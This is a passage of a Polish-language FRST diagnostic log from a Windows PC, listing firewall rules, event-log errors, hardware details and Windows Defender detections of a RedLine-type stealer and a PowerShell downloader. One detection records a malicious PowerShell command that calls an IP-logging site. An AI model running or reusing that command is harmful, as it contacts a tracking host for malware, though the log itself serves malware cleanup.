C:\Program Files\txgameassistant\appmarket\DL\syzs_dl_svr.exe (Tencent Technology(Shenzhen) Company Limited -> ) FirewallRules: [{62DFAD71-0C98-4370-8E52-1BD56A81F6EE}] => (Allow) C:\Program Files\txgameassistant\appmarket\DL\syzs_dl_svr.exe (Tencent Technology(Shenzhen) Company Limited -> ) FirewallRules: [{967993BE-97E4-4559-B89E-70230483C1AC}] => (Allow) C:\Program Files\txgameassistant\appmarket\DL\syzs_dl_svr.exe (Tencent Technology(Shenzhen) Company Limited -> ) FirewallRules: [{4AB917B2-C92E-42E0-9E59-8AB8EB92DC6A}] => (Allow) C:\Program Files\txgameassistant\appmarket\DL\syzs_dl_svr.exe (Tencent Technology(Shenzhen) Company Limited -> ) FirewallRules: [{B979F1AF-93E8-44B4-A9F5-4C8CA634C588}] => (Allow) C:\Program Files\txgameassistant\appmarket\DL\syzs_dl_svr.exe (Tencent Technology(Shenzhen) Company Limited -> ) FirewallRules: [{83F10D18-B251-4A80-90D4-83A8FB2B322D}] => (Allow) C:\Program Files (x86)\Remotr\RemotrServer.exe (RemoteMyApp sp. z o.o. -> RemoteMyApp sp. z o.o.) FirewallRules: [TCP Query User{6D44FE8D-DBF9-4A80-96DC-E3758C657E8A}C:\users\user\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\user\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [UDP Query User{A7351835-9739-41B4-8C2C-067CADD9A106}C:\users\user\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\user\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{0789F560-C523-4FFF-98B8-292BEC195CD3}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.158.820.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{10305B7F-1999-48BA-B827-D6AAE64880E4}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.158.820.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{89A61C05-1B04-4177-A706-67E7ADCD1C20}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.158.820.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{2F292D66-B9AA-43D5-87C6-1C360992DE5E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.158.820.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{926B482F-11BF-4BCB-81B1-2E952C592B81}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.158.820.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{574B7F45-8B1C-486E-89B8-EF719D4B539D}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.158.820.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{5EA368D0-AB04-4271-A99E-4F3A4F53B1C7}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.158.820.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{7DCED0BD-5690-4D21-8555-2D7D20FAF138}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.158.820.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [TCP Query User{993838C3-FF97-453D-8C7E-72126A090F45}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [UDP Query User{093C93A7-1BEC-434D-90D1-96D723F04AAB}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [{6E193CCD-C174-4B43-9335-71708A6BEF77}] => (Block) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [{157D8414-16F2-4826-B7BD-AC18A71C85CF}] => (Block) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [TCP Query User{AB117970-8E15-4D13-ACBA-F155D456884B}C:\users\user\desktop\foldery\the.escapists2.v1.1.8.incl.dlc\the escapists 2\theescapists2.exe] => (Allow) C:\users\user\desktop\foldery\the.escapists2.v1.1.8.incl.dlc\the escapists 2\theescapists2.exe () [Brak podpisu cyfrowego] FirewallRules: [UDP Query User{0E503F76-900C-4D42-BE94-9BCF863ABAD0}C:\users\user\desktop\foldery\the.escapists2.v1.1.8.incl.dlc\the escapists 2\theescapists2.exe] => (Allow) C:\users\user\desktop\foldery\the.escapists2.v1.1.8.incl.dlc\the escapists 2\theescapists2.exe () [Brak podpisu cyfrowego] FirewallRules: [{EFD68C25-5374-4695-A117-9CB86420A9BE}] => (Block) C:\users\user\desktop\foldery\the.escapists2.v1.1.8.incl.dlc\the escapists 2\theescapists2.exe () [Brak podpisu cyfrowego] FirewallRules: [{B3E07FB3-9E6C-431E-A7CA-90777949D2B3}] => (Block) C:\users\user\desktop\foldery\the.escapists2.v1.1.8.incl.dlc\the escapists 2\theescapists2.exe () [Brak podpisu cyfrowego] FirewallRules: [{DF9E297F-8A74-40CB-AA9C-EA21AA26C692}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fall Guys\FallGuys_client.exe (EasyAntiCheat Oy -> Epic Games, Inc) FirewallRules: [{69BBB165-5B8A-407B-BA6A-202D2DC9C8C4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fall Guys\FallGuys_client.exe (EasyAntiCheat Oy -> Epic Games, Inc) FirewallRules: [{11AEFF09-50C9-4647-9449-A8215BA17068}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fall Guys\FallGuys_client_game.exe () [Brak podpisu cyfrowego] FirewallRules: [{E970025F-9EE1-4B0E-94CC-B362DB4550FA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fall Guys\FallGuys_client_game.exe () [Brak podpisu cyfrowego] FirewallRules: [{1E17593A-FF78-4D86-BF7A-91D077A442CA}] => (Allow) C:\Users\user\AppData\Local\Programs\Opera GX\78.0.4093.214\opera.exe (Opera Software AS -> Opera Software) FirewallRules: [{39C28406-D896-4990-B447-73FD8D9B88A6}] => (Allow) C:\Users\user\AppData\Local\Programs\Opera GX\79.0.4143.73\opera.exe (Opera Software AS -> Opera Software) FirewallRules: [TCP Query User{5249F840-521C-4BA6-ACFB-F8CECFBAA812}C:\users\user\appdata\local\programs\opera gx\opera.exe] => (Allow) C:\users\user\appdata\local\programs\opera gx\opera.exe (Opera Software AS -> Opera Software) FirewallRules: [UDP Query User{3AD837ED-8A5E-479E-8A49-AA15EFC19588}C:\users\user\appdata\local\programs\opera gx\opera.exe] => (Allow) C:\users\user\appdata\local\programs\opera gx\opera.exe (Opera Software AS -> Opera Software) FirewallRules: [{1715A0D7-08EE-483E-A349-234252F2B172}] => (Allow) C:\WINDOWS\system32\spacedeskService.exe (Datronicsoft, Inc. -> ) FirewallRules: [{4D8F94DA-B511-4090-BEEE-CA68F41F17C2}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH) FirewallRules: [{4760FCEE-4B8F-4B81-835C-C7AC535B8A56}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH) FirewallRules: [{057057A4-028F-4C59-B00F-82B44F1B9A46}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH) FirewallRules: [{4E5D12F7-1205-4402-A9AD-4B944D483467}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH) FirewallRules: [{B79648A0-1969-4160-9E14-CFBEA93A80B2}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH) FirewallRules: [{F9FED4D4-9E83-4109-8677-EAA37674A5D0}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH) FirewallRules: [{7CEB3D37-9250-4146-9A46-F447E0ED8DFE}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) ==================== Punkty Przywracania systemu ========================= ==================== Wadliwe urządzenia w Menedżerze urządzeń ============ ==================== Błędy w Dzienniku zdarzeń: ======================== Dziennik Aplikacja: ================== Error: (10/04/2021 01:50:11 PM) (Source: VSS) (EventID: 12289) (User: ) Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd DeviceIoControl(\\?\Volume{0600e869-0000-0000-0000-402400000000} - 000000000000027C,0x0053c008,0000020D01806370,0,0000020D018073A0,4096,[0]). hr = 0x80820001, Plik rozruchowy jest za mały, aby obsługiwać trwałe migawki. . Operacja: Przetwarzanie metody EndPrepareSnapshots Kontekst: Kontekst wykonywania: System Provider Error: (10/04/2021 01:47:29 PM) (Source: VSS) (EventID: 12289) (User: ) Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd DeviceIoControl(\\?\Volume{0600e869-0000-0000-0000-402400000000} - 0000000000000270,0x0053c008,0000020D01806370,0,0000020D018073A0,4096,[0]). hr = 0x80820001, Plik rozruchowy jest za mały, aby obsługiwać trwałe migawki. . Operacja: Przetwarzanie metody EndPrepareSnapshots Kontekst: Kontekst wykonywania: System Provider Error: (10/04/2021 01:45:55 PM) (Source: VSS) (EventID: 12289) (User: ) Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd DeviceIoControl(\\?\Volume{0600e869-0000-0000-0000-402400000000} - 000000000000025C,0x0053c008,0000020D018063D0,0,0000020D01807400,4096,[0]). hr = 0x80820001, Plik rozruchowy jest za mały, aby obsługiwać trwałe migawki. . Operacja: Przetwarzanie metody EndPrepareSnapshots Kontekst: Kontekst wykonywania: System Provider Error: (10/04/2021 12:53:35 PM) (Source: Software Protection Platform Service) (EventID: 8229) (User: ) Description: Aparat reguł nie może wykonać co najmniej jednej z zaplanowanych akcji. Kod błędu:0x80080005 Ścieżka: Argumenty: Error: (10/04/2021 12:48:06 PM) (Source: Software Protection Platform Service) (EventID: 8229) (User: ) Description: Aparat reguł nie może wykonać co najmniej jednej z zaplanowanych akcji. Kod błędu:0x80080005 Ścieżka: Argumenty: Error: (10/04/2021 12:46:06 PM) (Source: Software Protection Platform Service) (EventID: 8229) (User: ) Description: Aparat reguł nie może wykonać co najmniej jednej z zaplanowanych akcji. Kod błędu:0x80080005 Ścieżka: Argumenty: Error: (10/04/2021 12:28:24 PM) (Source: Software Protection Platform Service) (EventID: 8229) (User: ) Description: Aparat reguł nie może wykonać co najmniej jednej z zaplanowanych akcji. Kod błędu:0x80080005 Ścieżka: Argumenty: Error: (10/04/2021 12:21:42 PM) (Source: Software Protection Platform Service) (EventID: 8229) (User: ) Description: Aparat reguł nie może wykonać co najmniej jednej z zaplanowanych akcji. Kod błędu:0x80080005 Ścieżka: Argumenty: Dziennik System: ============= Error: (10/04/2021 12:53:35 PM) (Source: DCOM) (EventID: 10010) (User: ZARZĄDZANIE NT) Description: Serwer {3C296D07-90AE-4FAC-86F9-65EAA8B82D22} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (10/04/2021 12:51:34 PM) (Source: DCOM) (EventID: 10010) (User: ZARZĄDZANIE NT) Description: Serwer {3C296D07-90AE-4FAC-86F9-65EAA8B82D22} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (10/04/2021 12:48:06 PM) (Source: DCOM) (EventID: 10010) (User: ZARZĄDZANIE NT) Description: Serwer {3C296D07-90AE-4FAC-86F9-65EAA8B82D22} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (10/04/2021 12:46:06 PM) (Source: DCOM) (EventID: 10010) (User: ZARZĄDZANIE NT) Description: Serwer {3C296D07-90AE-4FAC-86F9-65EAA8B82D22} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (10/04/2021 12:44:00 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi ProgramRabbitechnologiesEG z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (10/04/2021 12:36:04 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi ProgramRabbitechnologiesEG z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (10/04/2021 12:28:24 PM) (Source: DCOM) (EventID: 10010) (User: ZARZĄDZANIE NT) Description: Serwer {3C296D07-90AE-4FAC-86F9-65EAA8B82D22} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (10/04/2021 12:26:24 PM) (Source: DCOM) (EventID: 10010) (User: ZARZĄDZANIE NT) Description: Serwer {3C296D07-90AE-4FAC-86F9-65EAA8B82D22} nie zarejestrował się w modelu DCOM w wymaganym czasie. Windows Defender: ================ Date: 2021-10-02 18:28:02 Description: Produkt Program antywirusowy Microsoft Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:MSIL/RelineStealer.D!MTB&threatid=2147793764&enterprise=0 Nazwa: Trojan:MSIL/RelineStealer.D!MTB Identyfikator: 2147793764 Ważność: Poważny Kategoria: Koń trojański Ścieżka: amsi:_C:\Users\user\AppData\Local\Temp\3635.exe; amsi:_C:\Users\user\Documents\B1n9CGBOSDKXDDL_TjQCOL4z.exe; amsi:_C:\Users\user\Documents\g_V8EPrHNGnyq2zsQwp4R_DE.exe Pochodzenie wykrycia: Nieznane Typ wykrycia: Konkretne Źródło wykrycia: System Użytkownik: ZARZĄDZANIE NT\SYSTEM Nazwa procesu: C:\Users\user\AppData\Local\Temp\3635.exe Wersja analizy zabezpieczeń: AV: 1.349.1093.0, AS: 1.349.1093.0, NIS: 1.349.1093.0 Wersja aparatu: AM: 1.1.18500.10, NIS: 1.1.18500.10 Date: 2021-10-02 18:21:29 Description: Produkt Program antywirusowy Microsoft Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:MSIL/RelineStealer.D!MTB&threatid=2147793764&enterprise=0 Nazwa: Trojan:MSIL/RelineStealer.D!MTB Identyfikator: 2147793764 Ważność: Poważny Kategoria: Koń trojański Ścieżka: amsi:_C:\Users\user\Documents\B1n9CGBOSDKXDDL_TjQCOL4z.exe; amsi:_C:\Users\user\Documents\g_V8EPrHNGnyq2zsQwp4R_DE.exe Pochodzenie wykrycia: Nieznane Typ wykrycia: Konkretne Źródło wykrycia: System Użytkownik: ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Unknown Wersja analizy zabezpieczeń: AV: 1.349.1093.0, AS: 1.349.1093.0, NIS: 1.349.1093.0 Wersja aparatu: AM: 1.1.18500.10, NIS: 1.1.18500.10 Date: 2021-10-02 18:21:29 Description: Produkt Program antywirusowy Microsoft Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDownloader:PowerShell/Gripogle.A&threatid=2147767492&enterprise=0 Nazwa: TrojanDownloader:PowerShell/Gripogle.A Identyfikator: 2147767492 Ważność: Poważny Kategoria: Koń trojański pobierający inne programy Ścieżka: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -command Invoke-WebRequest -Uri https://iplogger.org/1aX5d7 Pochodzenie wykrycia: Nieznane Typ wykrycia: Konkretne Źródło wykrycia: System Użytkownik: ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Unknown Wersja analizy zabezpieczeń: AV: 1.349.1093.0, AS: 1.349.1093.0, NIS: 1.349.1093.0 Wersja aparatu: AM: 1.1.18500.10, NIS: 1.1.18500.10 Date: 2021-09-20 20:35:46 Description: Produkt Program antywirusowy Microsoft Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDownloader:PowerShell/Gripogle.A&threatid=2147767492&enterprise=0 Nazwa: TrojanDownloader:PowerShell/Gripogle.A Identyfikator: 2147767492 Ważność: Poważny Kategoria: Koń trojański pobierający inne programy Ścieżka: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -command Invoke-WebRequest -Uri https://iplogger.org/1aX5d7 Pochodzenie wykrycia: Nieznane Typ wykrycia: Konkretne Źródło wykrycia: System Użytkownik: ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Unknown Wersja analizy zabezpieczeń: AV: 1.349.1093.0, AS: 1.349.1093.0, NIS: 1.349.1093.0 Wersja aparatu: AM: 1.1.18500.10, NIS: 1.1.18500.10 Date: 2021-09-20 20:35:46 Description: Produkt Program antywirusowy Microsoft Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDownloader:PowerShell/Gripogle.A&threatid=2147767492&enterprise=0 Nazwa: TrojanDownloader:PowerShell/Gripogle.A Identyfikator: 2147767492 Ważność: Poważny Kategoria: Koń trojański pobierający inne programy Ścieżka: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -command Invoke-WebRequest -Uri https://iplogger.org/1aX5d7 Pochodzenie wykrycia: Nieznane Typ wykrycia: Konkretne Źródło wykrycia: System Użytkownik: ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Unknown Wersja analizy zabezpieczeń: AV: 1.349.1093.0, AS: 1.349.1093.0, NIS: 1.349.1093.0 Wersja aparatu: AM: 1.1.18500.10, NIS: 1.1.18500.10 Date: 2021-10-02 18:21:13 Description: Produkt Program antywirusowy Microsoft Defender napotkał błąd podczas próby aktualizacji analizy zabezpieczeń. Nowa wersja analizy zabezpieczeń: Poprzednia wersja analizy zabezpieczeń: 1.349.1093.0 Źródło aktualizacji: Centrum firmy Microsoft ds. ochrony przed złośliwym oprogramowaniem Typ analizy zabezpieczeń: Oprogramowanie antywirusowe Typ aktualizacji: Pełne Użytkownik: ZARZĄDZANIE NT\USŁUGA SIECIOWA Bieżąca wersja aparatu: Poprzednia wersja aparatu: 1.1.18500.10 Kod błędu: 0x80072ee7 Opis błędu: Nie można określić nazwy serwera lub adresu. Date: 2021-10-02 18:21:13 Description: Produkt Program antywirusowy Microsoft Defender napotkał błąd podczas próby aktualizacji analizy zabezpieczeń. Nowa wersja analizy zabezpieczeń: Poprzednia wersja analizy zabezpieczeń: 1.349.1093.0 Źródło aktualizacji: Centrum firmy Microsoft ds. ochrony przed złośliwym oprogramowaniem Typ analizy zabezpieczeń: Oprogramowanie antyszpiegowskie Typ aktualizacji: Pełne Użytkownik: ZARZĄDZANIE NT\USŁUGA SIECIOWA Bieżąca wersja aparatu: Poprzednia wersja aparatu: 1.1.18500.10 Kod błędu: 0x80072ee7 Opis błędu: Nie można określić nazwy serwera lub adresu. Date: 2021-10-02 18:21:13 Description: Produkt Program antywirusowy Microsoft Defender napotkał błąd podczas próby aktualizacji analizy zabezpieczeń. Nowa wersja analizy zabezpieczeń: Poprzednia wersja analizy zabezpieczeń: 1.349.1093.0 Źródło aktualizacji: Centrum firmy Microsoft ds. ochrony przed złośliwym oprogramowaniem Typ analizy zabezpieczeń: Oprogramowanie antywirusowe Typ aktualizacji: Pełne Użytkownik: ZARZĄDZANIE NT\USŁUGA SIECIOWA Bieżąca wersja aparatu: Poprzednia wersja aparatu: 1.1.18500.10 Kod błędu: 0x80072ee7 Opis błędu: Nie można określić nazwy serwera lub adresu. Date: 2021-10-02 18:21:13 Description: Produkt Program antywirusowy Microsoft Defender napotkał błąd podczas próby aktualizacji analizy zabezpieczeń. Nowa wersja analizy zabezpieczeń: Poprzednia wersja analizy zabezpieczeń: 1.349.1093.0 Źródło aktualizacji: Centrum firmy Microsoft ds. ochrony przed złośliwym oprogramowaniem Typ analizy zabezpieczeń: Oprogramowanie antywirusowe Typ aktualizacji: Pełne Użytkownik: ZARZĄDZANIE NT\USŁUGA SIECIOWA Bieżąca wersja aparatu: Poprzednia wersja aparatu: 1.1.18500.10 Kod błędu: 0x80072ee7 Opis błędu: Nie można określić nazwy serwera lub adresu. Date: 2021-10-02 18:21:13 Description: Produkt Program antywirusowy Microsoft Defender napotkał błąd podczas próby aktualizacji analizy zabezpieczeń. Nowa wersja analizy zabezpieczeń: Poprzednia wersja analizy zabezpieczeń: 1.349.1093.0 Źródło aktualizacji: Centrum firmy Microsoft ds. ochrony przed złośliwym oprogramowaniem Typ analizy zabezpieczeń: Oprogramowanie antyszpiegowskie Typ aktualizacji: Pełne Użytkownik: ZARZĄDZANIE NT\USŁUGA SIECIOWA Bieżąca wersja aparatu: Poprzednia wersja aparatu: 1.1.18500.10 Kod błędu: 0x80072ee7 Opis błędu: Nie można określić nazwy serwera lub adresu. CodeIntegrity: =============== Date: 2021-10-02 21:04:25 Description: Windows blocked file \Device\HarddiskVolume2\Windows\SysWOW64\scrobj.dll which has been disallowed for protected processes. Date: 2021-05-25 10:54:17 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Chrome\Application\90.0.4430.212\chrome.dll that did not meet the Microsoft signing level requirements. ==================== Statystyki pamięci =========================== BIOS: American Megatrends Inc. 5222 10/14/2019 Płyta główna: ASUSTeK COMPUTER INC. PRIME A320M-A Procesor: AMD Ryzen 3 3200GE with Radeon Vega Graphics Procent pamięci w użyciu: 87% Całkowita pamięć fizyczna: 6074.98 MB Dostępna pamięć fizyczna: 782.76 MB Całkowita pamięć wirtualna: 16314.98 MB Dostępna pamięć wirtualna: 7798.25 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:237.91 GB) (Free:144.3 GB) NTFS Drive d: (ESD-USB) (Removable) (Total:14.41 GB) (Free:14.41 GB) FAT32 \\?\Volume{0600e869-0000-0000-0000-100000000000}\ (Zastrzeżone przez system) (Fixed) (Total:0.57 GB) (Free:0.11 GB) NTFS ==================== MBR & Tablica partycji ==================== ========================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: 0600E869) Partition 1: (Active) - (Size=579 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=237.9 GB) - (Type=07 NTFS) ========================================================== Disk: 1 (MBR Code: Windows 7/8/10) (Size: 14.4 GB) (Disk ID: DB619F38) Partition 1: (Active) - (Size=14.4 GB) - (Type=0C) ==================== Koniec Addition.txt =======================